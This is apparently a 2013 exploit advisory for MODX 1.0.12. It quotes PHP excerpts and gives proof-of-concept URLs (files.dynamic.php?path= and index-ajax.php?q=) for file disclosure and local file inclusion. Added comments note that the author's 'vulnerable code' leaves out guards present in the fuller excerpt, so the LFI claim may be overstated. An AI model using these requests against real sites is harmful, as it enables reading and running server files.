
MODX Local LFI & File Disclosure

Author: JoKeR_StEx , Published: 08-12-2013
##################################################
# Exploit title : MODX Local LFI & File Disclosure
# Author : JoKeR_StEx
# Version : 1.0.12
# Download Software Link : http://modx.com/download/
# DaTe : 08/12/2013
###################################################
1/File Disclosure
<?...
....
file_get_contents $buffer = file_get_contents ($filename);

$filename = $_REQUEST['path'];
$_REQUEST['path'] = str_replace('..', '', $_REQUEST['path']);
....<?
//
127.0.0.1/modx/manager/actions/files.dynamic.php?path=[File]

2/ LFI :
<?.....
....
// Dispatcher excerpt: the requested handler name comes straight from the request
// (`q` via $_GET for GET, $_POST otherwise). The assignment is evaluated as the
// condition, so an empty or "0" value skips the whole block (PHP truthiness).
if($axhandler = (strtoupper($_SERVER['REQUEST_METHOD'])=='GET') ? $_GET['q'] : $_POST['q'])
{
// Character whitelist: everything outside [A-Za-z0-9_\-\.\/] is dropped. Dots and
// slashes survive, so this is not a traversal guard by itself; the realpath() and
// prefix check below are what actually constrain the target.
$axhandler = preg_replace('/[^A-Za-z0-9_\-\.\/]/', '', $axhandler);

// Get realpath

// Resolves the path relative to MODX_BASE_PATH (defined outside this excerpt).
// `=` binds tighter than `or`, so $axhandler receives the realpath() result and
// die() only runs when realpath() returns false (nonexistent path).
$axhandler = realpath(MODX_BASE_PATH.$axhandler) or die(); // full

// Normalise Windows separators so the prefix comparison below is separator-agnostic.
$axhandler = str_replace('\\','/',$axhandler);

// Drops strlen(MODX_BASE_PATH) bytes without checking that the resolved path
// actually starts with MODX_BASE_PATH; if realpath() resolved elsewhere, the
// "relative" value is an unrelated tail of that path.
$axhandler_rel = substr($axhandler, strlen(MODX_BASE_PATH)); // relative

//$axhandler = realpath($directory.str_replace($directory, '', $axhandler));


// Only non-empty relative paths ending in ".php" (case-insensitive) are considered.
if ($axhandler_rel && strtolower(substr($axhandler_rel, -4)) == '.php') {
// permission check

// $allowed_dirs is defined outside this excerpt. The check is a plain string-prefix
// comparison with loose `==`; an entry without a trailing slash also matches sibling
// directories that share the prefix — confirm the list's entries are separator-terminated.
$allowed = false;
foreach($allowed_dirs as $allowed_dir) {

if (substr($axhandler_rel, 0, strlen($allowed_dir)) == $allowed_dir) {

$allowed = true;

break;
}

}

// The resolved file is executed as PHP; every guard above is what stands between
// request input and this include.
if ($allowed) {

include_once($axhandler);

}


}


}
The Vulnerable Code :
// Author's reduction of the block above: the preg_replace() whitelist, the
// realpath()/MODX_BASE_PATH resolution, the ".php" suffix test and the
// $allowed_dirs prefix check that sit between these two statements are omitted here.
if($axhandler = (strtoupper($_SERVER['REQUEST_METHOD'])=='GET') ? $_GET['q'] : $_POST['q'])
include_once($axhandler);

....
<?
//
127.0.0.1/modx/index-ajax.php?q=[file]

The End ^__^
###########################################################################################
